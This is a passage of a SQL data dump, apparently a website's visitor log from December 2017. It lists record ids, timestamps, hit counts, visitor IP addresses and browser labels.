(184987,1512462714,1,1,0,0,'91.196.178.67','chrome'),(184988,1512463499,1,0,1,0,'66.249.70.29',''),(184989,1512463570,1,0,1,0,'66.249.70.27',''),(184990,1512463883,1,0,1,0,'66.249.64.28',''),(184991,1512465024,1,1,0,0,'95.132.43.234','firefox'),(184992,1512465060,1,1,0,0,'46.48.13.161','chrome'),(184993,1512465995,1,1,0,0,'94.179.166.59','chrome'),(184994,1512466097,1,1,0,0,'91.196.178.168','chrome'),(184995,1512466494,1,1,0,0,'46.211.104.194','chrome'),(184996,1512466839,1,1,0,0,'82.145.221.128','chrome'),(184997,1512466905,1,1,0,0,'217.69.133.5','other'),(184998,1512467354,1,1,0,0,'91.196.178.162','chrome'),(184999,1512467824,1,1,0,0,'8.29.198.26','other'),(185000,1512467997,1,0,1,0,'66.249.64.30',''),(185001,1512468475,1,1,0,0,'91.196.178.69','chrome'),(185002,1512468690,1,1,0,0,'54.165.59.7','other'),(185003,1512468879,1,1,0,0,'185.190.149.1','other'),(185004,1512469469,2,2,0,0,'91.196.178.69','chrome'),(185005,1512469560,1,1,0,0,'151.18.5.176','chrome'),(185006,1512470588,1,1,0,0,'180.76.15.154','other'),(185007,1512470767,1,1,0,0,'66.249.64.30','chrome'),(185008,1512470948,1,1,0,0,'91.196.179.138','chrome'),(185009,1512471178,1,1,0,0,'188.166.30.200','chrome'),(185010,1512471956,1,1,0,0,'141.8.142.74','other'),(185011,1512472193,1,1,0,0,'91.196.178.67','chrome'),(185012,1512473097,1,0,1,0,'66.249.64.28',''),(185013,1512474245,1,1,0,0,'91.196.178.37','chrome'),(185014,1512475766,1,1,0,0,'178.93.235.160','chrome'),(185015,1512475796,1,1,0,0,'87.250.224.46','other'),(185016,1512477189,1,1,0,0,'46.133.223.37','other'),(185017,1512478190,1,0,1,0,'66.249.70.29',''),(185018,1512478215,1,1,0,0,'141.8.142.74','other'),(185019,1512478248,1,1,0,0,'91.196.178.70','chrome'),(185020,1512478537,1,1,0,0,'95.132.43.234','firefox'),(185021,1512478666,1,1,0,0,'8.29.198.26','other'),(185022,1512478975,1,1,0,0,'40.77.167.51','other'),(185023,1512479286,1,1,0,0,'141.8.142.74','other'),(185024,1512479813,1,1,0,0,'91.196.178.130','firefox'),(185025,1512480013,1,1,0,0,'93.171.241.65','chrome'),(185026,1512480249,1,1,0,0,'91.196.178.67','chrome'),(185027,1512480377,1,1,0,0,'91.196.178.69','chrome'),(185028,1512480995,1,0,1,0,'66.249.64.30',''),(185029,1512481235,1,1,0,0,'178.62.246.213','chrome'),(185030,1512481623,1,1,0,0,'91.196.178.163','chrome'),(185031,1512482090,1,1,0,0,'93.171.241.65','other'),(185032,1512482125,1,1,0,0,'130.180.219.0','chrome'),(185033,1512482524,2,2,0,0,'141.8.142.74','other'),(185034,1512483010,1,1,0,0,'91.196.178.66','chrome'),(185035,1512483818,1,1,0,0,'91.196.178.168','chrome'),(185036,1512483988,1,1,0,0,'141.8.142.74','other'),(185037,1512484238,1,1,0,0,'91.196.178.67','chrome'),(185038,1512484444,1,1,0,0,'93.171.241.65','chrome'),(185039,1512485038,1,1,0,0,'54.165.59.7','other'),(185040,1512485190,1,1,0,0,'91.209.11.236','other'),(185041,1512485255,1,1,0,0,'91.196.178.162','chrome'),(185042,1512485292,1,1,0,0,'46.211.102.225','chrome'),(185043,1512485715,1,1,0,0,'141.8.142.74','other'),(185044,1512485894,1,1,0,0,'91.196.178.48','chrome'),(185045,1512485932,1,1,0,0,'85.237.234.211','other'),(185046,1512486288,3,3,0,0,'178.154.171.88','other'),(185047,1512487049,1,0,1,0,'66.249.64.30',''),(185048,1512487261,1,1,0,0,'217.69.133.245','other'),(185049,1512487308,1,1,0,0,'141.8.142.74','other'),(185050,1512488693,1,1,0,0,'66.249.64.28','chrome'),(185051,1512488849,1,1,0,0,'195.10.210.70','chrome'),(185052,1512489505,1,1,0,0,'8.29.198.25','other'),(185053,1512490295,1,1,0,0,'40.77.167.22','other'),(185054,1512490571,1,1,0,0,'141.8.142.74','other'),(185055,1512490691,1,1,0,0,'46.133.31.179','other'),(185056,1512490976,1,1,0,0,'66.249.70.25','chrome'),(185057,1512491079,1,1,0,0,'91.209.11.236','other'),(185058,1512492021,1,0,1,0,'66.249.64.28',''),(185059,1512492115,1,1,0,0,'92.112.124.12','chrome'),(185060,1512492652,1,0,1,0,'66.249.70.25',''),(185061,1512493046,1,1,0,0,'178.121.213.163','chrome'),(185062,1512493521,1,1,0,0,'46.211.148.216','other'),(185063,1512493660,1,1,0,0,'95.132.55.61','firefox'),(185064,1512493812,3,3,0,0,'141.8.142.74','other'),(185065,1512493850,1,1,0,0,'66.249.64.29','chrome'),(185066,1512494010,1,1,0,0,'91.196.178.71','firefox'),(185067,1512494125,1,1,0,0,'207.46.13.141','other'),(185068,1512494232,1,1,0,0,'180.76.15.151','other'),(185069,1512494855,1,0,1,0,'66.249.64.30',''),(185070,1512496246,2,0,2,0,'66.249.64.28',''),(185071,1512496356,1,1,0,0,'178.154.171.88','other'),(185072,1512496525,1,1,0,0,'40.77.167.22','other'),(185073,1512496791,1,0,1,0,'66.249.64.29',''),(185074,1512497653,1,1,0,0,'141.8.142.74','other'),(185075,1512497682,1,1,0,0,'91.196.178.100','chrome'),(185076,1512497739,1,1,0,0,'91.196.178.134','chrome'),(185077,1512498119,1,0,1,0,'66.249.64.30',''),(185078,1512498158,1,1,0,0,'95.133.150.76','chrome'),(185079,1512498831,1,1,0,0,'91.196.178.165','chrome'),(185080,1512499038,1,1,0,0,'188.163.16.6','chrome'),(185081,1512499051,1,1,0,0,'185.11.28.70','chrome'),(185082,1512499187,2,2,0,0,'54.165.59.7','other'),(185083,1512499733,1,1,0,0,'141.8.142.74','other'),(185084,1512499762,1,0,1,0,'66.249.70.25',''),(185085,1512499859,1,1,0,0,'91.196.178.164','chrome'),(185086,1512500348,1,1,0,0,'8.29.198.27','other'),(185087,1512500382,1,1,0,0,'180.76.15.146','other'),(185088,1512500805,4,4,0,0,'62.109.20.113','other'),(185089,1512502013,1,1,0,0,'108.59.8.70','other'),(185090,1512503224,1,1,0,0,'217.69.133.68','other'),(185091,1512503473,1,1,0,0,'141.8.142.74','other'),(185092,1512504049,1,1,0,0,'46.211.147.62','chrome'),(185093,1512504291,1,0,1,0,'68.180.229.52',''),(185094,1512504344,1,1,0,0,'66.249.70.25','chrome'),(185095,1512504362,2,1,1,0,'66.249.64.30',''),(185096,1512505390,1,1,0,0,'207.46.13.143','other'),(185097,1512505485,1,1,0,0,'188.166.72.50','other'),(185098,1512506163,1,1,0,0,'188.166.73.177','chrome'),(185099,1512506828,2,2,0,0,'141.8.142.74','other'),(185100,1512509016,15,15,0,0,'5.9.63.162','other'),(185101,1512509121,1,0,1,0,'66.249.70.29',''),(185102,1512509222,1,1,0,0,'80.62.117.87','other'),(185103,1512509292,1,1,0,0,'178.154.171.88','other'),(185104,1512509350,1,1,0,0,'40.77.167.51','other'),(185105,1512510378,1,0,1,0,'68.180.229.52',''),(185106,1512511193,1,1,0,0,'8.29.198.25','other'),(185107,1512511892,1,0,1,0,'68.180.229.52',''),(185108,1512512226,1,0,1,0,'66.249.70.25',''),(185109,1512512596,1,1,0,0,'207.46.13.141','other'),(185110,1512512693,2,2,0,0,'141.8.142.74','other'),(185111,1512513174,2,2,0,0,'178.154.171.88','other'),(185112,1512513878,1,1,0,0,'207.46.13.143','other'),(185113,1512514170,1,1,0,0,'141.8.142.74','other'),(185114,1512515133,2,2,0,0,'141.8.142.74','other'),(185115,1512515616,1,1,0,0,'5.58.2.231','msie'),(185116,1512516070,1,1,0,0,'87.250.224.46','other'),(185117,1512516524,2,2,0,0,'141.8.142.74','other'),(185118,1512518515,1,1,0,0,'178.154.171.88','other'),(185119,1512519628,1,1,0,0,'141.8.142.74','other'),(185120,1512520550,1,1,0,0,'207.46.13.143','other'),(185121,1512522040,1,1,0,0,'8.29.198.26','other'),(185122,1512522598,1,0,1,0,'66.249.64.30',''),(185123,1512525868,1,1,0,0,'40.77.167.22','other'),(185124,1512526077,1,1,0,0,'87.250.224.46','other'),(185125,1512527929,1,1,0,0,'178.154.171.88','other'),(185126,1512528212,1,1,0,0,'141.8.142.74','other'),(185127,1512529243,1,1,0,0,'91.209.11.236','other'),(185128,1512529962,1,1,0,0,'87.250.224.46','other'),(185129,1512530194,1,1,0,0,'141.8.142.74','other'),(185130,1512530218,1,1,0,0,'213.240.199.61','firefox'),(185131,1512531359,1,1,0,0,'141.8.142.74','other'),(185132,1512531834,1,1,0,0,'46.48.13.161','chrome'),(185133,1512531917,1,1,0,0,'66.222.145.201','other'),(185134,1512532511,2,2,0,0,'141.8.142.74','other'),(185135,1512532648,1,1,0,0,'40.77.167.22','other'),(185136,1512532889,1,1,0,0,'8.29.198.25','other'),(185137,1512533582,1,1,0,0,'141.8.142.74','other'),(185138,1512534973,1,1,0,0,'141.8.142.74','other'),(185139,1512535363,1,1,0,0,'217.69.133.245','other'),(185140,1512535506,1,1,0,0,'207.46.13.141','other'),(185141,1512535973,1,1,0,0,'95.220.199.246','chrome'),(185142,1512536384,1,0,1,0,'66.249.70.27',''),(185143,1512536633,1,1,0,0,'91.196.178.69','other'),(185144,1512536863,1,0,1,0,'66.249.64.28',''),(185145,1512536885,1,1,0,0,'207.46.13.141','other'),(185146,1512537868,1,1,0,0,'40.77.167.51','other'),(185147,1512537947,1,1,0,0,'40.77.167.22','other'),(185148,1512540319,1,1,0,0,'54.208.102.37','other'),(185149,1512540583,1,0,1,0,'68.180.229.52',''),(185150,1512540994,1,1,0,0,'207.46.13.141','other'),(185151,1512542803,1,1,0,0,'40.77.167.51','other'),(185152,1512543502,1,1,0,0,'141.8.142.74','other'),(185153,1512543728,1,1,0,0,'8.29.198.25','other'),(185154,1512544874,1,1,0,0,'178.93.148.91','firefox'),(185155,1512544953,1,1,0,0,'78.111.185.7','chrome'),(185156,1512545486,1,1,0,0,'91.196.177.46','chrome'),(185157,1512546732,1,1,0,0,'91.196.178.68','chrome'),(185158,1512547432,1,1,0,0,'46.133.254.221','chrome'),(185159,1512548935,1,1,0,0,'91.237.107.14','chrome'),(185160,1512549118,1,1,0,0,'91.196.178.169','chrome'),(185161,1512549378,1,1,0,0,'91.196.178.69','chrome'),(185162,1512549481,1,1,0,0,'176.31.255.65','other'),(185163,1512549704,1,1,0,0,'95.135.90.238','chrome'),(185164,1512550230,1,1,0,0,'91.196.178.169','chrome'),(185165,1512551597,1,1,0,0,'93.78.215.203','msie'),(185166,1512552120,1,1,0,0,'94.178.125.183','chrome'),(185167,1512552137,1,1,0,0,'40.77.167.22','other'),(185168,1512552300,2,2,0,0,'91.196.178.169','chrome'),(185169,1512552800,1,1,0,0,'40.77.167.51','other'),(185170,1512553224,1,1,0,0,'79.178.38.138','chrome'),(185171,1512553255,1,1,0,0,'91.196.178.69','chrome'),(185172,1512554383,1,1,0,0,'37.52.148.126','chrome'),(185173,1512554385,1,1,0,0,'93.80.129.103','msie'),(185174,1512554386,1,1,0,0,'37.110.97.74','msie'),(185175,1512554566,1,1,0,0,'8.29.198.26','other'),(185176,1512555107,1,1,0,0,'180.76.15.152','other'),(185177,1512555197,1,0,1,0,'66.249.64.28',''),(185178,1512555216,1,1,0,0,'178.154.171.88','other'),(185179,1512555414,1,1,0,0,'66.249.64.30','chrome'),(185180,1512555655,1,1,0,0,'37.52.17.192','chrome'),(185181,1512555910,1,1,0,0,'141.8.142.74','other'),(185182,1512555969,1,1,0,0,'193.24.222.90','chrome'),(185183,1512556032,2,2,0,0,'198.37.118.36','firefox'),(185184,1512556086,1,1,0,0,'91.196.178.67','firefox'),(185185,1512556850,1,1,0,0,'91.196.177.15','firefox'),(185186,1512557318,1,1,0,0,'188.166.52.165','chrome'),(185187,1512557419,1,1,0,0,'37.9.113.182','other'),(185188,1512557592,1,1,0,0,'91.196.178.69','chrome'),(185189,1512557734,1,1,0,0,'217.69.133.246','other'),(185190,1512557782,1,1,0,0,'91.196.178.69','firefox'),(185191,1512558426,1,1,0,0,'37.9.113.151','other'),(185192,1512559240,1,1,0,0,'93.171.241.65','other'),(185193,1512559480,1,1,0,0,'193.19.119.19','firefox'),(185194,1512559945,1,1,0,0,'91.196.178.69','firefox'),(185195,1512559946,1,1,0,0,'194.126.181.229','chrome'),(185196,1512560416,1,1,0,0,'91.196.179.77','other'),(185197,1512560519,1,1,0,0,'5.3.156.30','chrome'),(185198,1512561418,1,1,0,0,'141.8.142.74','other'),(185199,1512561872,2,2,0,0,'178.94.61.111','chrome'),(185200,1512561937,1,1,0,0,'46.211.127.61','other'),(185201,1512563242,1,1,0,0,'91.196.178.69','chrome'),(185202,1512563392,1,1,0,0,'37.53.80.50','firefox'),(185203,1512563524,1,1,0,0,'91.196.178.72','chrome'),(185204,1512563802,1,1,0,0,'213.191.28.19','chrome'),(185205,1512564275,2,2,0,0,'91.196.178.168','chrome'),(185206,1512564724,1,1,0,0,'217.69.133.231','other'),(185207,1512565280,1,1,0,0,'91.196.178.68','chrome'),(185208,1512565399,1,1,0,0,'178.154.200.7','other'),(185209,1512565418,1,1,0,0,'8.29.198.26','other'),(185210,1512565744,1,1,0,0,'37.73.225.134','chrome'),(185211,1512565787,1,1,0,0,'198.204.244.90','other'),(185212,1512566287,1,1,0,0,'78.111.190.111','chrome'),(185213,1512566501,1,1,0,0,'93.79.114.200','chrome'),(185214,1512566737,1,1,0,0,'199.58.86.211','other'),(185215,1512566991,1,1,0,0,'91.196.178.68','chrome'),(185216,1512567445,1,1,0,0,'91.196.178.69','chrome'),(185217,1512568116,1,1,0,0,'207.46.13.141','other'),(185218,1512568262,1,1,0,0,'77.222.134.100','firefox'),(185219,1512569053,1,1,0,0,'141.8.142.96','other'),(185220,1512569444,1,1,0,0,'5.45.207.69','other'),(185221,1512570696,1,1,0,0,'91.196.178.72','chrome'),(185222,1512571579,1,1,0,0,'77.37.131.27','msie'),(185223,1512571581,1,1,0,0,'46.211.200.215','other'),(185224,1512571741,1,1,0,0,'109.63.137.164','msie'),(185225,1512571755,1,1,0,0,'207.46.13.141','other'),(185226,1512572083,1,1,0,0,'40.77.167.22','other'),(185227,1512572238,1,1,0,0,'91.196.178.68','chrome'),(185228,1512572581,1,1,0,0,'178.140.117.248','msie'),(185229,1512572620,1,1,0,0,'62.122.91.171','chrome'),(185230,1512572885,1,0,1,0,'66.249.70.29',''),(185231,1512572947,1,1,0,0,'46.211.144.21','other'),(185232,1512573674,1,1,0,0,'95.24.16.51','msie'),(185233,1512573852,1,1,0,0,'95.24.5.231','msie'),(185234,1512574168,1,1,0,0,'178.54.190.249','chrome'),(185235,1512574402,1,1,0,0,'217.69.133.234','other'),(185236,1512574849,1,1,0,0,'66.249.64.29','chrome'),(185237,1512576067,1,1,0,0,'194.44.79.193','chrome'),(185238,1512576237,1,1,0,0,'95.134.185.206','chrome'),(185239,1512576271,1,1,0,0,'8.29.198.26','other'),(185240,1512576358,1,1,0,0,'91.196.178.164','chrome'),(185241,1512577378,1,1,0,0,'178.121.213.163','chrome'),(185242,1512577578,1,1,0,0,'180.76.15.18','other'),(185243,1512578620,1,1,0,0,'91.196.178.70','firefox'),(185244,1512579320,1,1,0,0,'171.13.14.150','chrome'),(185245,1512579347,1,1,0,0,'106.120.162.94','chrome'),(185246,1512579705,1,1,0,0,'178.154.171.88','other'),(185247,1512580249,1,1,0,0,'176.8.249.185','firefox'),(185248,1512580639,3,3,0,0,'95.10.22.101','other'),(185249,1512581115,1,1,0,0,'91.196.177.46','firefox'),(185250,1512581389,1,1,0,0,'95.132.13.221','chrome'),(185251,1512583637,1,1,0,0,'91.196.177.46','firefox'),(185252,1512583817,1,1,0,0,'141.8.142.74','other'),(185253,1512584985,1,1,0,0,'141.8.142.74','other'),(185254,1512585066,1,1,0,0,'37.53.231.45','other'),(185255,1512585693,1,1,0,0,'207.46.13.141','other'),(185256,1512587113,1,1,0,0,'8.29.198.25','other'),(185257,1512587376,1,1,0,0,'91.196.177.11','other'),(185258,1512587488,1,1,0,0,'141.8.142.74','other'),(185259,1512590065,1,0,1,0,'68.180.229.52',''),(185260,1512590098,1,1,0,0,'92.113.31.29','chrome'),(185261,1512590279,1,1,0,0,'141.8.142.74','other'),(185262,1512590450,1,1,0,0,'13.56.229.65','chrome'),(185263,1512590835,1,1,0,0,'180.76.15.161','other'),(185264,1512591466,1,1,0,0,'40.77.167.77','other'),(185265,1512592042,1,1,0,0,'91.196.178.130','firefox'),(185266,1512592475,1,1,0,0,'91.196.178.47','chrome'),(185267,1512593306,1,1,0,0,'178.154.200.8','other'),(185268,1512593432,1,1,0,0,'5.9.111.70','other'),(185269,1512593614,1,1,0,0,'91.196.178.130','firefox'),(185270,1512593673,1,1,0,0,'87.250.224.77','other'),(185271,1512593861,1,1,0,0,'185.63.255.201','chrome'),(185272,1512594416,1,1,0,0,'40.77.167.77','other'),(185273,1512594675,1,1,0,0,'207.46.13.143','other'),(185274,1512595029,1,1,0,0,'176.97.1.114','chrome'),(185275,1512595906,1,1,0,0,'37.9.113.138','other'),(185276,1512595910,1,1,0,0,'178.154.200.32','other'),(185277,1512596348,1,1,0,0,'178.154.171.81','other'),(185278,1512597256,1,1,0,0,'217.69.133.238','other'),(185279,1512597303,1,1,0,0,'89.178.239.5','chrome'),(185280,1512597677,2,2,0,0,'141.8.142.74','other'),(185281,1512597957,1,1,0,0,'8.29.198.26','other'),(185282,1512598787,1,1,0,0,'95.67.40.140','other'),(185283,1512598806,1,1,0,0,'31.43.156.8','other'),(185284,1512598920,1,1,0,0,'178.154.171.88','other'),(185285,1512598966,2,2,0,0,'141.8.142.74','other'),(185286,1512601037,2,2,0,0,'141.8.142.74','other'),(185287,1512602130,1,1,0,0,'141.8.142.74','other'),(185288,1512602923,1,1,0,0,'178.154.171.88','other'),(185289,1512602972,1,1,0,0,'40.77.167.77','other'),(185290,1512603780,1,1,0,0,'207.46.13.141','other'),(185291,1512604092,1,1,0,0,'40.77.167.22','other'),(185292,1512605017,1,1,0,0,'141.8.142.74','other'),(185293,1512605781,1,1,0,0,'178.154.171.88','other'),(185294,1512605813,1,1,0,0,'40.77.167.22','other'),(185295,1512608505,1,1,0,0,'207.46.13.143','other'),(185296,1512608545,1,1,0,0,'54.165.59.7','other'),(185297,1512608656,1,1,0,0,'178.154.171.88','other'),(185298,1512608802,1,1,0,0,'8.29.198.26','other'),(185299,1512609532,1,1,0,0,'40.77.167.77','other'),(185300,1512614887,1,1,0,0,'213.180.203.8','other'),(185301,1512616863,1,0,1,0,'66.249.64.30',''),(185302,1512618296,1,1,0,0,'40.77.167.9','other'),(185303,1512619634,1,1,0,0,'8.29.198.27','other'),(185304,1512622942,14,14,0,0,'88.198.0.163','other'),(185305,1512627623,1,1,0,0,'94.178.125.183','chrome'),(185306,1512628174,3,3,0,0,'46.229.168.65','other'),(185307,1512628198,4,4,0,0,'46.229.168.79','other'),(185308,1512628218,1,1,0,0,'46.229.168.70','other'),(185309,1512628235,7,7,0,0,'46.229.168.77','other'),(185310,1512628248,6,6,0,0,'46.229.168.67','other'),(185311,1512628271,6,6,0,0,'46.229.168.66','other'),(185312,1512628290,3,3,0,0,'46.229.168.72','other'),(185313,1512628328,2,2,0,0,'46.229.168.76','other'),(185314,1512628363,2,2,0,0,'46.229.168.71','other'),(185315,1512628382,1,1,0,0,'188.165.4.128','chrome'),(185316,1512628395,5,5,0,0,'46.229.168.68','other'),(185317,1512628453,2,2,0,0,'46.229.168.78','other'),(185318,1512628489,1,1,0,0,'217.69.133.228','other'),(185319,1512628569,3,3,0,0,'46.229.168.74','other'),(185320,1512628612,7,7,0,0,'46.229.168.75','other'),(185321,1512628780,1,1,0,0,'46.229.168.69','other'),(185322,1512628817,3,3,0,0,'46.229.168.80','other'),(185323,1512628975,3,3,0,0,'46.229.168.73','other'),(185324,1512629116,5,5,0,0,'46.229.168.79','other'),(185325,1512629139,2,2,0,0,'46.229.168.77','other'),(185326,1512629190,3,3,0,0,'46.229.168.66','other'),(185327,1512629260,5,5,0,0,'46.229.168.76','other'),(185328,1512629278,4,4,0,0,'46.229.168.65','other'),(185329,1512629335,4,4,0,0,'46.229.168.67','other'),(185330,1512629355,4,4,0,0,'46.229.168.72','other'),(185331,1512629375,4,4,0,0,'46.229.168.78','other'),(185332,1512629379,1,1,0,0,'91.196.178.67','chrome'),(185333,1512629423,4,4,0,0,'46.229.168.71','other'),(185334,1512629571,3,3,0,0,'46.229.168.68','other'),(185335,1512629621,1,1,0,0,'46.229.168.75','other'),(185336,1512629676,8,8,0,0,'46.229.168.70','other'),(185337,1512629801,4,4,0,0,'46.229.168.80','other'),(185338,1512629910,8,8,0,0,'46.229.168.73','other'),(185339,1512630038,5,5,0,0,'46.229.168.74','other'),(185340,1512630141,2,2,0,0,'46.229.168.69','other'),(185341,1512630258,6,6,0,0,'46.229.168.66','other'),(185342,1512630268,6,6,0,0,'46.229.168.79','other'),(185343,1512630327,1,1,0,0,'5.58.46.252','chrome'),(185344,1512630331,7,7,0,0,'46.229.168.71','other'),(185345,1512630345,4,4,0,0,'46.229.168.78','other'),(185346,1512630362,1,1,0,0,'46.229.168.72','other'),(185347,1512630476,1,1,0,0,'8.29.198.25','other'),(185348,1512630487,5,5,0,0,'46.229.168.68','other'),(185349,1512630505,4,4,0,0,'46.229.168.76','other'),(185350,1512630741,3,3,0,0,'46.229.168.70','other'),(185351,1512630768,1,1,0,0,'91.196.177.28','firefox'),(185352,1512630835,5,5,0,0,'46.229.168.65','other'),(185353,1512630921,6,6,0,0,'46.229.168.73','other'),(185354,1512630938,5,5,0,0,'46.229.168.80','other'),(185355,1512630955,2,2,0,0,'46.229.168.77','other'),(185356,1512631031,2,2,0,0,'46.229.168.67','other'),(185357,1512631058,1,1,0,0,'178.54.190.249','chrome'),(185358,1512631210,3,3,0,0,'46.229.168.69','other'),(185359,1512631229,2,2,0,0,'46.229.168.79','other'),(185360,1512631265,5,5,0,0,'46.229.168.72','other'),(185361,1512631280,1,1,0,0,'40.77.167.77','other'),(185362,1512631332,5,5,0,0,'46.229.168.78','other'),(185363,1512631387,4,4,0,0,'46.229.168.71','other'),(185364,1512631392,1,1,0,0,'195.230.119.34','chrome'),(185365,1512631429,5,5,0,0,'46.229.168.68','other'),(185366,1512631454,10,10,0,0,'46.229.168.75','other'),(185367,1512631495,10,10,0,0,'46.229.168.76','other'),(185368,1512631634,12,12,0,0,'46.229.168.74','other'),(185369,1512631651,6,6,0,0,'46.229.168.66','other'),(185370,1512631771,8,8,0,0,'46.229.168.65','other'),(185371,1512631846,4,4,0,0,'46.229.168.70','other'),(185372,1512631871,2,2,0,0,'46.229.168.73','other'),(185373,1512631954,8,8,0,0,'46.229.168.80','other'),(185374,1512632109,1,1,0,0,'91.196.178.67','chrome'),(185375,1512632170,6,6,0,0,'46.229.168.79','other'),(185376,1512632236,6,6,0,0,'46.229.168.72','other'),(185377,1512632257,1,1,0,0,'141.8.142.74','other'),(185378,1512632294,6,6,0,0,'46.229.168.77','other'),(185379,1512632342,5,5,0,0,'46.229.168.71','other'),(185380,1512632445,1,1,0,0,'46.229.168.68','other'),(185381,1512632617,8,8,0,0,'46.229.168.67','other'),(185382,1512632642,2,2,0,0,'46.229.168.66','other'),(185383,1512632669,4,4,0,0,'46.229.168.78','other'),(185384,1512632700,1,1,0,0,'46.229.168.76','other'),(185385,1512632736,8,8,0,0,'46.229.168.69','other'),(185386,1512632770,7,7,0,0,'46.229.168.75','other'),(185387,1512632789,4,4,0,0,'46.229.168.65','other'),(185388,1512632821,7,7,0,0,'46.229.168.74','other'),(185389,1512632908,9,9,0,0,'46.229.168.80','other'),(185390,1512633039,4,4,0,0,'46.229.168.73','other'),(185391,1512633105,3,3,0,0,'46.229.168.79','other'),(185392,1512633254,1,1,0,0,'213.202.254.136','opera'),(185393,1512633305,2,2,0,0,'46.229.168.71','other'),(185394,1512633383,4,4,0,0,'46.229.168.68','other'),(185395,1512633394,7,7,0,0,'46.229.168.72','other'),(185396,1512633499,1,0,1,0,'66.249.64.28',''),(185397,1512633515,3,3,0,0,'46.229.168.77','other'),(185398,1512633719,6,6,0,0,'46.229.168.78','other'),(185399,1512633773,5,5,0,0,'46.229.168.69','other'),(185400,1512633829,3,3,0,0,'46.229.168.66','other'),(185401,1512633867,1,1,0,0,'91.196.178.70','firefox'),(185402,1512633918,1,1,0,0,'46.229.168.70','other'),(185403,1512633939,6,6,0,0,'46.229.168.65','other'),(185404,1512633968,4,4,0,0,'46.229.168.76','other'),(185405,1512634011,9,9,0,0,'46.229.168.75','other'),(185406,1512634044,3,3,0,0,'46.229.168.79','other'),(185407,1512634060,5,5,0,0,'46.229.168.80','other'),(185408,1512634082,7,7,0,0,'46.229.168.74','other'),(185409,1512634114,6,6,0,0,'46.229.168.73','other'),(185410,1512634298,3,3,0,0,'46.229.168.67','other'),(185411,1512634364,1,1,0,0,'92.113.174.213','chrome'),(185412,1512634532,3,3,0,0,'46.229.168.72','other'),(185413,1512634608,1,1,0,0,'46.229.168.68','other'),(185414,1512634753,2,2,0,0,'46.229.168.66','other'),(185415,1512634822,4,4,0,0,'46.229.168.70','other'),(185416,1512634826,1,1,0,0,'91.196.178.65','chrome'),(185417,1512634862,1,1,0,0,'46.229.168.77','other'),(185418,1512634925,2,2,0,0,'46.229.168.76','other'),(185419,1512634960,3,3,0,0,'46.229.168.65','other'),(185420,1512635035,1,1,0,0,'46.229.168.80','other'),(185421,1512635055,1,1,0,0,'46.229.168.74','other'),(185422,1512635128,1,1,0,0,'46.229.168.73','other'),(185423,1512636012,1,0,1,0,'68.180.229.52',''),(185424,1512637346,2,2,0,0,'91.196.178.67','chrome'),(185425,1512637348,1,1,0,0,'91.142.163.254','firefox'),(185426,1512637560,3,3,0,0,'46.229.168.78','other'),(185427,1512637616,7,7,0,0,'46.229.168.67','other'),(185428,1512637637,9,9,0,0,'46.229.168.76','other'),(185429,1512637640,2,2,0,0,'46.229.168.73','other'),(185430,1512637651,4,4,0,0,'46.229.168.66','other'),(185431,1512637687,6,6,0,0,'46.229.168.69','other'),(185432,1512637692,5,5,0,0,'46.229.168.77','other'),(185433,1512637711,4,4,0,0,'46.229.168.68','other'),(185434,1512637739,6,6,0,0,'46.229.168.70','other'),(185435,1512637766,6,6,0,0,'46.229.168.79','other'),(185436,1512637806,5,5,0,0,'46.229.168.65','other'),(185437,1512637853,10,10,0,0,'46.229.168.80','other'),(185438,1512637909,5,5,0,0,'46.229.168.74','other'),(185439,1512637920,2,2,0,0,'46.229.168.75','other'),(185440,1512638163,6,6,0,0,'46.229.168.72','other'),(185441,1512638245,4,4,0,0,'46.229.168.71','other'),(185442,1512638489,6,6,0,0,'46.229.168.78','other'),(185443,1512638543,1,1,0,0,'91.211.135.230','chrome'),(185444,1512638570,7,7,0,0,'46.229.168.73','other'),(185445,1512638690,4,4,0,0,'46.229.168.76','other'),(185446,1512638746,7,7,0,0,'46.229.168.67','other'),(185447,1512638846,4,4,0,0,'46.229.168.66','other'),(185448,1512638887,5,5,0,0,'46.229.168.69','other'),(185449,1512638948,6,6,0,0,'46.229.168.65','other'),(185450,1512638963,2,2,0,0,'46.229.168.68','other'),(185451,1512638981,3,3,0,0,'46.229.168.79','other'),(185452,1512639144,3,3,0,0,'46.229.168.74','other'),(185453,1512639162,7,7,0,0,'46.229.168.72','other'),(185454,1512639202,3,3,0,0,'46.229.168.71','other'),(185455,1512639258,7,7,0,0,'46.229.168.75','other'),(185456,1512639269,3,3,0,0,'46.229.168.80','other'),(185457,1512639341,3,3,0,0,'46.229.168.70','other'),(185458,1512639493,1,1,0,0,'93.78.215.203','firefox'),(185459,1512639640,4,4,0,0,'46.229.168.78','other'),(185460,1512639691,5,5,0,0,'46.229.168.77','other'),(185461,1512639793,1,1,0,0,'91.196.178.67','chrome'),(185462,1512639808,7,7,0,0,'46.229.168.67','other'),(185463,1512639829,4,4,0,0,'46.229.168.66','other'),(185464,1512639864,5,5,0,0,'46.229.168.68','other'),(185465,1512639901,6,6,0,0,'46.229.168.65','other'),(185466,1512639949,1,1,0,0,'89.178.239.5','chrome'),(185467,1512639967,5,5,0,0,'46.229.168.79','other'),(185468,1512639988,5,5,0,0,'46.229.168.76','other'),(185469,1512640118,3,3,0,0,'46.229.168.71','other'),(185470,1512640243,5,5,0,0,'46.229.168.72','other'),(185471,1512640331,6,6,0,0,'46.229.168.73','other'),(185472,1512640348,2,2,0,0,'46.229.168.69','other'),(185473,1512640369,5,5,0,0,'46.229.168.80','other'),(185474,1512640494,4,4,0,0,'46.229.168.70','other'),(185475,1512640655,4,4,0,0,'46.229.168.77','other'),(185476,1512640856,4,4,0,0,'46.229.168.66','other'),(185477,1512640896,3,3,0,0,'46.229.168.74','other'),(185478,1512640935,6,6,0,0,'46.229.168.68','other'),(185479,1512640961,3,3,0,0,'46.229.168.76','other'),(185480,1512640999,5,5,0,0,'46.229.168.79','other'),(185481,1512641077,4,4,0,0,'46.229.168.71','other'),(185482,1512641115,3,3,0,0,'46.229.168.67','other'),(185483,1512641144,4,4,0,0,'46.229.168.65','other'),(185484,1512641162,6,6,0,0,'46.229.168.78','other'),(185485,1512641222,7,7,0,0,'46.229.168.72','other'),(185486,1512641314,1,1,0,0,'8.29.198.25','other'),(185487,1512641331,2,2,0,0,'46.229.168.75','other'),(185488,1512641432,5,5,0,0,'46.229.168.80','other'),(185489,1512641528,4,4,0,0,'46.229.168.73','other'),(185490,1512641580,1,1,0,0,'91.196.178.67','firefox'),(185491,1512641785,3,3,0,0,'46.229.168.66','other'),(185492,1512641819,5,5,0,0,'46.229.168.70','other'),(185493,1512641850,5,5,0,0,'46.229.168.77','other'),(185494,1512641940,6,6,0,0,'46.229.168.74','other'),(185495,1512641956,4,4,0,